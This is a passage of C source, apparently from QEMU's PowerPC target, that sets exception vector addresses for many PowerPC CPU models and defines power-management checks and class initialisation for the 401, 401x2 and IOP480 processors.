env->excp_vectors[POWERPC_EXCP_FIT] = 0x00001010; env->excp_vectors[POWERPC_EXCP_WDT] = 0x00001020; env->excp_vectors[POWERPC_EXCP_DTLB] = 0x00001100; env->excp_vectors[POWERPC_EXCP_ITLB] = 0x00001200; env->excp_vectors[POWERPC_EXCP_DEBUG] = 0x00002000; env->ivor_mask = 0x0000FFF0UL; env->ivpr_mask = 0xFFFF0000UL; /* Hardware reset vector */ env->hreset_vector = 0xFFFFFFFCUL; } #if defined(TODO_USER_ONLY) static void init_excp_MPC5xx(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000900; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_TRACE] = 0x00000D00; env->excp_vectors[POWERPC_EXCP_FPA] = 0x00000E00; env->excp_vectors[POWERPC_EXCP_EMUL] = 0x00001000; env->excp_vectors[POWERPC_EXCP_DABR] = 0x00001C00; env->excp_vectors[POWERPC_EXCP_IABR] = 0x00001C00; env->excp_vectors[POWERPC_EXCP_MEXTBR] = 0x00001E00; env->excp_vectors[POWERPC_EXCP_NMEXTBR] = 0x00001F00; env->ivor_mask = 0x0000FFF0UL; env->ivpr_mask = 0xFFFF0000UL; /* Hardware reset vector */ env->hreset_vector = 0x00000100UL; } static void init_excp_MPC8xx(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000900; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_TRACE] = 0x00000D00; env->excp_vectors[POWERPC_EXCP_FPA] = 0x00000E00; env->excp_vectors[POWERPC_EXCP_EMUL] = 0x00001000; env->excp_vectors[POWERPC_EXCP_ITLB] = 0x00001100; env->excp_vectors[POWERPC_EXCP_DTLB] = 0x00001200; env->excp_vectors[POWERPC_EXCP_ITLBE] = 0x00001300; env->excp_vectors[POWERPC_EXCP_DTLBE] = 0x00001400; env->excp_vectors[POWERPC_EXCP_DABR] = 0x00001C00; env->excp_vectors[POWERPC_EXCP_IABR] = 0x00001C00; env->excp_vectors[POWERPC_EXCP_MEXTBR] = 0x00001E00; env->excp_vectors[POWERPC_EXCP_NMEXTBR] = 0x00001F00; env->ivor_mask = 0x0000FFF0UL; env->ivpr_mask = 0xFFFF0000UL; /* Hardware reset vector */ env->hreset_vector = 0x00000100UL; } #endif static void init_excp_G2(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000800; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_CRITICAL] = 0x00000A00; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_TRACE] = 0x00000D00; env->excp_vectors[POWERPC_EXCP_IFTLB] = 0x00001000; env->excp_vectors[POWERPC_EXCP_DLTLB] = 0x00001100; env->excp_vectors[POWERPC_EXCP_DSTLB] = 0x00001200; env->excp_vectors[POWERPC_EXCP_IABR] = 0x00001300; env->excp_vectors[POWERPC_EXCP_SMI] = 0x00001400; /* Hardware reset vector */ env->hreset_vector = 0x00000100UL; } static void init_excp_e200(CPUPPCState *env, target_ulong ivpr_mask) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000FFC; env->excp_vectors[POWERPC_EXCP_CRITICAL] = 0x00000000; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000000; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000000; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000000; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000000; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000000; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000000; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000000; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000000; env->excp_vectors[POWERPC_EXCP_APU] = 0x00000000; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000000; env->excp_vectors[POWERPC_EXCP_FIT] = 0x00000000; env->excp_vectors[POWERPC_EXCP_WDT] = 0x00000000; env->excp_vectors[POWERPC_EXCP_DTLB] = 0x00000000; env->excp_vectors[POWERPC_EXCP_ITLB] = 0x00000000; env->excp_vectors[POWERPC_EXCP_DEBUG] = 0x00000000; env->excp_vectors[POWERPC_EXCP_SPEU] = 0x00000000; env->excp_vectors[POWERPC_EXCP_EFPDI] = 0x00000000; env->excp_vectors[POWERPC_EXCP_EFPRI] = 0x00000000; env->ivor_mask = 0x0000FFF7UL; env->ivpr_mask = ivpr_mask; /* Hardware reset vector */ env->hreset_vector = 0xFFFFFFFCUL; } static void init_excp_BookE(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_CRITICAL] = 0x00000000; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000000; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000000; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000000; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000000; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000000; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000000; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000000; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000000; env->excp_vectors[POWERPC_EXCP_APU] = 0x00000000; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000000; env->excp_vectors[POWERPC_EXCP_FIT] = 0x00000000; env->excp_vectors[POWERPC_EXCP_WDT] = 0x00000000; env->excp_vectors[POWERPC_EXCP_DTLB] = 0x00000000; env->excp_vectors[POWERPC_EXCP_ITLB] = 0x00000000; env->excp_vectors[POWERPC_EXCP_DEBUG] = 0x00000000; env->ivor_mask = 0x0000FFF0UL; env->ivpr_mask = 0xFFFF0000UL; /* Hardware reset vector */ env->hreset_vector = 0xFFFFFFFCUL; } static void init_excp_601(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000800; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_IO] = 0x00000A00; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_RUNM] = 0x00002000; /* Hardware reset vector */ env->hreset_vector = 0x00000100UL; } static void init_excp_602(CPUPPCState *env) { /* XXX: exception prefix has a special behavior on 602 */ env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000800; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_TRACE] = 0x00000D00; env->excp_vectors[POWERPC_EXCP_IFTLB] = 0x00001000; env->excp_vectors[POWERPC_EXCP_DLTLB] = 0x00001100; env->excp_vectors[POWERPC_EXCP_DSTLB] = 0x00001200; env->excp_vectors[POWERPC_EXCP_IABR] = 0x00001300; env->excp_vectors[POWERPC_EXCP_SMI] = 0x00001400; env->excp_vectors[POWERPC_EXCP_WDT] = 0x00001500; env->excp_vectors[POWERPC_EXCP_EMUL] = 0x00001600; /* Hardware reset vector */ env->hreset_vector = 0x00000100UL; } static void init_excp_603(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000800; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_TRACE] = 0x00000D00; env->excp_vectors[POWERPC_EXCP_IFTLB] = 0x00001000; env->excp_vectors[POWERPC_EXCP_DLTLB] = 0x00001100; env->excp_vectors[POWERPC_EXCP_DSTLB] = 0x00001200; env->excp_vectors[POWERPC_EXCP_IABR] = 0x00001300; env->excp_vectors[POWERPC_EXCP_SMI] = 0x00001400; /* Hardware reset vector */ env->hreset_vector = 0x00000100UL; } static void init_excp_604(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000800; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_TRACE] = 0x00000D00; env->excp_vectors[POWERPC_EXCP_PERFM] = 0x00000F00; env->excp_vectors[POWERPC_EXCP_IABR] = 0x00001300; env->excp_vectors[POWERPC_EXCP_SMI] = 0x00001400; /* Hardware reset vector */ env->hreset_vector = 0x00000100UL; } static void init_excp_7x0(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000800; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_TRACE] = 0x00000D00; env->excp_vectors[POWERPC_EXCP_PERFM] = 0x00000F00; env->excp_vectors[POWERPC_EXCP_IABR] = 0x00001300; env->excp_vectors[POWERPC_EXCP_SMI] = 0x00001400; env->excp_vectors[POWERPC_EXCP_THERM] = 0x00001700; /* Hardware reset vector */ env->hreset_vector = 0x00000100UL; } static void init_excp_750cl(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000800; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_TRACE] = 0x00000D00; env->excp_vectors[POWERPC_EXCP_PERFM] = 0x00000F00; env->excp_vectors[POWERPC_EXCP_IABR] = 0x00001300; env->excp_vectors[POWERPC_EXCP_SMI] = 0x00001400; /* Hardware reset vector */ env->hreset_vector = 0x00000100UL; } static void init_excp_750cx(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000800; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_TRACE] = 0x00000D00; env->excp_vectors[POWERPC_EXCP_PERFM] = 0x00000F00; env->excp_vectors[POWERPC_EXCP_IABR] = 0x00001300; env->excp_vectors[POWERPC_EXCP_THERM] = 0x00001700; /* Hardware reset vector */ env->hreset_vector = 0x00000100UL; } /* XXX: Check if this is correct */ static void init_excp_7x5(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000800; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_TRACE] = 0x00000D00; env->excp_vectors[POWERPC_EXCP_PERFM] = 0x00000F00; env->excp_vectors[POWERPC_EXCP_IFTLB] = 0x00001000; env->excp_vectors[POWERPC_EXCP_DLTLB] = 0x00001100; env->excp_vectors[POWERPC_EXCP_DSTLB] = 0x00001200; env->excp_vectors[POWERPC_EXCP_IABR] = 0x00001300; env->excp_vectors[POWERPC_EXCP_SMI] = 0x00001400; env->excp_vectors[POWERPC_EXCP_THERM] = 0x00001700; /* Hardware reset vector */ env->hreset_vector = 0x00000100UL; } static void init_excp_7400(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000800; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_TRACE] = 0x00000D00; env->excp_vectors[POWERPC_EXCP_PERFM] = 0x00000F00; env->excp_vectors[POWERPC_EXCP_VPU] = 0x00000F20; env->excp_vectors[POWERPC_EXCP_IABR] = 0x00001300; env->excp_vectors[POWERPC_EXCP_SMI] = 0x00001400; env->excp_vectors[POWERPC_EXCP_VPUA] = 0x00001600; env->excp_vectors[POWERPC_EXCP_THERM] = 0x00001700; /* Hardware reset vector */ env->hreset_vector = 0x00000100UL; } static void init_excp_7450(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000800; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_TRACE] = 0x00000D00; env->excp_vectors[POWERPC_EXCP_PERFM] = 0x00000F00; env->excp_vectors[POWERPC_EXCP_VPU] = 0x00000F20; env->excp_vectors[POWERPC_EXCP_IFTLB] = 0x00001000; env->excp_vectors[POWERPC_EXCP_DLTLB] = 0x00001100; env->excp_vectors[POWERPC_EXCP_DSTLB] = 0x00001200; env->excp_vectors[POWERPC_EXCP_IABR] = 0x00001300; env->excp_vectors[POWERPC_EXCP_SMI] = 0x00001400; env->excp_vectors[POWERPC_EXCP_VPUA] = 0x00001600; /* Hardware reset vector */ env->hreset_vector = 0x00000100UL; } #if defined(TARGET_PPC64) static void init_excp_970(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_DSEG] = 0x00000380; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_ISEG] = 0x00000480; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000800; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_HDECR] = 0x00000980; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_TRACE] = 0x00000D00; env->excp_vectors[POWERPC_EXCP_PERFM] = 0x00000F00; env->excp_vectors[POWERPC_EXCP_VPU] = 0x00000F20; env->excp_vectors[POWERPC_EXCP_IABR] = 0x00001300; env->excp_vectors[POWERPC_EXCP_MAINT] = 0x00001600; env->excp_vectors[POWERPC_EXCP_VPUA] = 0x00001700; env->excp_vectors[POWERPC_EXCP_THERM] = 0x00001800; /* Hardware reset vector */ env->hreset_vector = 0x0000000000000100ULL; } static void init_excp_POWER7(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_DSEG] = 0x00000380; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_ISEG] = 0x00000480; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000800; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_HDECR] = 0x00000980; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_TRACE] = 0x00000D00; env->excp_vectors[POWERPC_EXCP_HDSI] = 0x00000E00; env->excp_vectors[POWERPC_EXCP_HISI] = 0x00000E20; env->excp_vectors[POWERPC_EXCP_HV_EMU] = 0x00000E40; env->excp_vectors[POWERPC_EXCP_HV_MAINT] = 0x00000E60; env->excp_vectors[POWERPC_EXCP_PERFM] = 0x00000F00; env->excp_vectors[POWERPC_EXCP_VPU] = 0x00000F20; env->excp_vectors[POWERPC_EXCP_VSXU] = 0x00000F40; /* Hardware reset vector */ env->hreset_vector = 0x0000000000000100ULL; } static void init_excp_POWER8(CPUPPCState *env) { init_excp_POWER7(env); env->excp_vectors[POWERPC_EXCP_SDOOR] = 0x00000A00; env->excp_vectors[POWERPC_EXCP_FU] = 0x00000F60; env->excp_vectors[POWERPC_EXCP_HV_FU] = 0x00000F80; env->excp_vectors[POWERPC_EXCP_SDOOR_HV] = 0x00000E80; } static void init_excp_POWER9(CPUPPCState *env) { init_excp_POWER8(env); env->excp_vectors[POWERPC_EXCP_HVIRT] = 0x00000EA0; } static void init_excp_POWER10(CPUPPCState *env) { init_excp_POWER9(env); } #endif /*****************************************************************************/ /* Power management enable checks */ static int check_pow_none(CPUPPCState *env) { return 0; } static int check_pow_nocheck(CPUPPCState *env) { return 1; } static int check_pow_hid0(CPUPPCState *env) { if (env->spr[SPR_HID0] & 0x00E00000) { return 1; } return 0; } static int check_pow_hid0_74xx(CPUPPCState *env) { if (env->spr[SPR_HID0] & 0x00600000) { return 1; } return 0; } static bool ppc_cpu_interrupts_big_endian_always(PowerPCCPU *cpu) { return true; } #ifdef TARGET_PPC64 static bool ppc_cpu_interrupts_big_endian_lpcr(PowerPCCPU *cpu) { return !(cpu->env.spr[SPR_LPCR] & LPCR_ILE); } #endif /*****************************************************************************/ /* PowerPC implementations definitions */ #define POWERPC_FAMILY_NAME(_name) \ glue(glue(ppc_, _name), _cpu_family_class_init) #define POWERPC_FAMILY(_name) \ static void \ glue(glue(ppc_, _name), _cpu_family_class_init)(CPUClass *, void *); \ \ static void glue(glue(ppc_, _name), _cpu_family_class_init) static void init_proc_401(CPUPPCState *env) { gen_spr_40x(env); gen_spr_401_403(env); gen_spr_401(env); init_excp_4xx_real(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc40x_irq_init(env_archcpu(env)); SET_FIT_PERIOD(12, 16, 20, 24); SET_WDT_PERIOD(16, 20, 24, 28); } POWERPC_FAMILY(401)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 401"; pcc->init_proc = init_proc_401; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_WRTEE | PPC_DCR | PPC_CACHE | PPC_CACHE_ICBI | PPC_40x_ICBT | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_4xx_COMMON | PPC_40x_EXCP; pcc->msr_mask = (1ull << MSR_KEY) | (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_ME) | (1ull << MSR_DE) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_REAL; pcc->excp_model = POWERPC_EXCP_40x; pcc->bus_model = PPC_FLAGS_INPUT_401; pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_DE | POWERPC_FLAG_BUS_CLK; } static void init_proc_401x2(CPUPPCState *env) { gen_spr_40x(env); gen_spr_401_403(env); gen_spr_401x2(env); gen_spr_compress(env); /* Memory management */ env->nb_tlb = 64; env->nb_ways = 1; env->id_tlbs = 0; env->tlb_type = TLB_EMB; init_excp_4xx_softmmu(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc40x_irq_init(env_archcpu(env)); SET_FIT_PERIOD(12, 16, 20, 24); SET_WDT_PERIOD(16, 20, 24, 28); } POWERPC_FAMILY(401x2)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 401x2"; pcc->init_proc = init_proc_401x2; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_DCR | PPC_WRTEE | PPC_CACHE | PPC_CACHE_ICBI | PPC_40x_ICBT | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_40x_TLB | PPC_MEM_TLBIA | PPC_MEM_TLBSYNC | PPC_4xx_COMMON | PPC_40x_EXCP; pcc->msr_mask = (1ull << 20) | (1ull << MSR_KEY) | (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_ME) | (1ull << MSR_DE) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_SOFT_4xx_Z; pcc->excp_model = POWERPC_EXCP_40x; pcc->bus_model = PPC_FLAGS_INPUT_401; pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_DE | POWERPC_FLAG_BUS_CLK; } #if 0 static void init_proc_401x3(CPUPPCState *env) { gen_spr_40x(env); gen_spr_401_403(env); gen_spr_401(env); gen_spr_401x2(env); gen_spr_compress(env); init_excp_4xx_softmmu(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc40x_irq_init(env_archcpu(env)); SET_FIT_PERIOD(12, 16, 20, 24); SET_WDT_PERIOD(16, 20, 24, 28); } POWERPC_FAMILY(401x3)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 401x3"; pcc->init_proc = init_proc_401x3; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_DCR | PPC_WRTEE | PPC_CACHE | PPC_CACHE_ICBI | PPC_40x_ICBT | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_40x_TLB | PPC_MEM_TLBIA | PPC_MEM_TLBSYNC | PPC_4xx_COMMON | PPC_40x_EXCP; pcc->msr_mask = (1ull << 20) | (1ull << MSR_KEY) | (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_ME) | (1ull << MSR_DWE) | (1ull << MSR_DE) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_SOFT_4xx_Z; pcc->excp_model = POWERPC_EXCP_40x; pcc->bus_model = PPC_FLAGS_INPUT_401; pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_DE | POWERPC_FLAG_BUS_CLK; } #endif static void init_proc_IOP480(CPUPPCState *env) { gen_spr_40x(env); gen_spr_401_403(env); gen_spr_401x2(env); gen_spr_compress(env); /* Memory management */ env->nb_tlb = 64; env->nb_ways = 1; env->id_tlbs = 0; env->tlb_type = TLB_EMB; init_excp_4xx_softmmu(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc40x_irq_init(env_archcpu(env)); SET_FIT_PERIOD(8, 12, 16, 20); SET_WDT_PERIOD(16, 20, 24, 28); } POWERPC_FAMILY(IOP480)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "IOP480"; pcc->init_proc = init_proc_IOP480; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_DCR | PPC_WRTEE | PPC_CACHE | PPC_CACHE_ICBI | PPC_40x_ICBT | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_40x_TLB | PPC_MEM_TLBIA | PPC_MEM_TLBSYNC | PPC_4xx_COMMON | PPC_40x_EXCP; pcc->msr_mask = (1ull << 20) | (1ull << MSR_KEY) | (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_ME) | (1ull << MSR_DE) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_LE); pcc->mmu_model = 